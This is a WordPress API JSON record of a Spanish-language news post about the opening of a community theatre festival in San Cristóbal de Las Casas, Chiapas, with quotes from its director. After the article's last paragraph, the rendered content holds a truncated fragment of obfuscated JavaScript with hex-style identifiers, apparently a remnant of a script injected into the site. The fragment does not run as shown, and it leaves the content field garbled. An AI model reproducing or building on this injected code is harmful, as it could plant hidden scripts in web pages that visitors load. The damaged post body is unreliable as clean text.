{"id":13000,"date":"2023-12-02T07:01:04","date_gmt":"2023-12-02T07:01:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13000"},"modified":"2023-12-02T07:01:05","modified_gmt":"2023-12-02T07:01:05","slug":"inicia-teatro-de-los-volcanes-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13000","title":{"rendered":"Inicia Teatro de los Volcanes en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701500342573-819x1024.jpg\" alt=\"\" class=\"wp-image-13001\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701500342573-819x1024.jpg 819w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701500342573-240x300.jpg 240w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701500342573-768x960.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701500342573.jpg 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal 02 de Diciembre del 2023. San Crist\u00f3bal de Las Casas.- Con la participaci\u00f3n de grupos provenientes de Quer\u00e9taro, Puebla, Colombia, Argentina, Brasil, entre otros, dio inicio el Vig\u00e9simo Octavo Festival de Teatro Comunitario de la Regi\u00f3n de los Volcanes, dio a conocer el director de este encuentro, Ra\u00fal P\u00e9rez Pineda.En entrevista, se\u00f1al\u00f3 que se encuentran presentando en tres importantes sedes como el auditorio de la Universidad Intercultural de Chiapas (Unich), el Centro Cultural Carlos Jurado y el Centro Cultural de la Zona Norte que ser\u00e1 la sede principal, d\u00f3nde tendr\u00e1n lugar las mesas de trabajo y algunas funciones teatrales, &#8220;son espect\u00e1culos que adem\u00e1s van en tenor de diferentes p\u00fablicos, y hay obras espec\u00edficas para ni\u00f1os que es importante este p\u00fablico para que tengan inquietud hacia las artes, los t\u00edteres son la fuente de ese importante proyecto&#8221;.&#8221;Va haber un desfile alrededor, en la Zona Norte, para invitar a los vecinos que nos acompa\u00f1en a este convite, se hace todos los a\u00f1os, as\u00ed como la ceremonia ritual del bast\u00f3n de mando, que en este caso del grupo de Zinacant\u00e1n se lo entrega al grupo de la Universidad, porque pertenece a todos justamente, tenemos ya 8 festivales en toda la Regi\u00f3n, en la zona mam de Uni\u00f3n Ju\u00e1rez se formaron grupos de teatro, ahorita hay gestores culturales que se encuentran trabajando justo para que a fin de a\u00f1o vayamos a dar una funci\u00f3n all\u00e1&#8221;.Asimismo, dijo que hay mucho inter\u00e9s en que haya talleres, que los ni\u00f1os tengan capacitaci\u00f3n, ya que el teatro impacta de forma positiva en la sociedad, &#8220;toda acci\u00f3n va por un cambio social, ha incidido en las pol\u00edticas culturales y es por eso que ahora o\u00edmos m\u00e1s teatro comunitario en muchas partes, ya hay varios temas en la Secretar\u00eda de Cultura que tienen que ver con los semilleros creativos y con todas estas pol\u00edticas culturales que no buscan artistas en s\u00ed, sino que cada persona que es tocada por el arte eleve su forma de pensar y su forma de ser para mejorar, estamos yendo a las c\u00e1rceles a dialogar a trav\u00e9s del teatro&#8221;.&#8221;Estamos preparando nuestros 30 a\u00f1os, vamos a hacer una gran fiesta, que sea algo sobresaliente, adem\u00e1s de que San Crist\u00f3bal es uno de los lugares que ha acogido este proyecto muy bien, d\u00f3nde hemos presentado en conjunto con el Celali trabajos muy interesantes, con la Unich, con grupos independientes, que en su momento han sido parte de este Festival&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 02 de Diciembre del 2023. San Crist\u00f3bal de Las Casas.- Con la participaci\u00f3n de grupos provenientes de Quer\u00e9taro, Puebla, Colombia, Argentina, Brasil, entre otros, dio inicio el Vig\u00e9simo Octavo Festival de Teatro Comunitario de la Regi\u00f3n de los Volcanes, dio a conocer el director de este encuentro, Ra\u00fal P\u00e9rez Pineda.En entrevista, se\u00f1al\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13001,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-13000","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13000","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13000"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13000\/revisions"}],"predecessor-version":[{"id":13002,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13000\/revisions\/13002"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13001"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13000"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13000"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13000"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}